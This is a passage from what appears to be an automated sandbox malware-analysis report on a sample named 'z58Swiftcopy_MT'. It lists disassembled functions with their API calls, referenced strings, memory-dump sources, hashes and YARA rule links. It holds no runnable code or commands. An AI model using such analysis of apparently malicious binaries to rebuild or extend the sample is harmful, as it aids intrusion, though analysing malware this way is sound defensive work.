                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4131475296-0
                                                                                                                                                                                                                                      • Opcode ID: bbad7829663e404974ee36071e77aa52346e6492d823ab1d084cd5c9aca113c0
                                                                                                                                                                                                                                      • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bbad7829663e404974ee36071e77aa52346e6492d823ab1d084cd5c9aca113c0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                                                                                                                                                      Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004116FF
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                                                                                                                                        • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                                                                        • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                                                                        • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                                                                      • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                                                                                      • API String ID: 2618321458-3614832568
                                                                                                                                                                                                                                      • Opcode ID: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                                                                                                                                                                                                      • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                                                                                                                                                      Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AttributesFilefreememset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2507021081-0
                                                                                                                                                                                                                                      • Opcode ID: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                                                                                                                                                                                                                      • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                                                                                                                                                      Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                                                                                                                                                      • malloc.MSVCRT ref: 00417524
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                                                                                                                                                      • free.MSVCRT ref: 00417544
                                                                                                                                                                                                                                      • free.MSVCRT ref: 00417562
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4131324427-0
                                                                                                                                                                                                                                      • Opcode ID: 2440c23a1bd9c14e736b75fc15117030069baeee03a9925480b775904b905708
                                                                                                                                                                                                                                      • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2440c23a1bd9c14e736b75fc15117030069baeee03a9925480b775904b905708
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                                                                                                                                                      Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                                                                                                                                                      • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                                                                                                                                                      • free.MSVCRT ref: 0041822B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: PathTemp$free
                                                                                                                                                                                                                                      • String ID: %s\etilqs_$etilqs_
                                                                                                                                                                                                                                      • API String ID: 924794160-1420421710
                                                                                                                                                                                                                                      • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                                                                                                                                      • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                                                                                                                                                      Function 0040FD9E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040FDD5
                                                                                                                                                                                                                                        • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                                                                                                                                        • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                                                                        • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                                                                                                                                      • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                                                                                      • API String ID: 1775345501-2769808009
                                                                                                                                                                                                                                      • Opcode ID: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                                                                                                                                                                                                      • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                                                                                                                                                                      Function 00414770 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0041477F
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0041479A
                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General,?,00000000,00000001), ref: 004147C1
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: wcscpy$CloseCreateFileHandle
                                                                                                                                                                                                                                      • String ID: General
                                                                                                                                                                                                                                      • API String ID: 999786162-26480598
                                                                                                                                                                                                                                      • Opcode ID: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                                                                                                                                                                                      • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                                                                                                                                                      Function 0040973C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                                                                                                                      • MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                                                                                                      • String ID: Error$Error %d: %s
                                                                                                                                                                                                                                      • API String ID: 313946961-1552265934
                                                                                                                                                                                                                                      • Opcode ID: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                                                                                                                                                                                                      • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                                                                                                                                                      Function 00435A61 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 394COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: foreign key constraint failed$new$oid$old
                                                                                                                                                                                                                                      • API String ID: 0-1953309616
                                                                                                                                                                                                                                      • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                                                                                                      • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                                                                                                                                                                      Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                                                                                                                                                      • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                                                                                                                                                      • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                                      • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                                                                      • API String ID: 3510742995-272990098
                                                                                                                                                                                                                                      • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                                                                                      • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                                                                                                                                                      Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                                                                                                      • String ID: gj
                                                                                                                                                                                                                                      • API String ID: 1297977491-4203073231
                                                                                                                                                                                                                                      • Opcode ID: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                                                                                                                                                                                      • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                                                                                                                                                      Function 0040E946 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E961
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E974
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E987
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E99A
                                                                                                                                                                                                                                      • free.MSVCRT ref: 0040E9D3
                                                                                                                                                                                                                                        • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??3@$free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2241099983-0
                                                                                                                                                                                                                                      • Opcode ID: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                                                                                                                                                                                                                      • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                                                                                                                                                      Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                                                                                                                                      • malloc.MSVCRT ref: 004174BD
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                                                                                                                                      • free.MSVCRT ref: 004174E4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4053608372-0
                                                                                                                                                                                                                                      • Opcode ID: 731f1bc2d56076fd9335eacaa0243be786ea79a0eeca4ef4ad1c585bb51aa26c
                                                                                                                                                                                                                                      • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 731f1bc2d56076fd9335eacaa0243be786ea79a0eeca4ef4ad1c585bb51aa26c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                                                                                                                                                      Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 0040D453
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                                                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4247780290-0
                                                                                                                                                                                                                                      • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                                                                                      • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
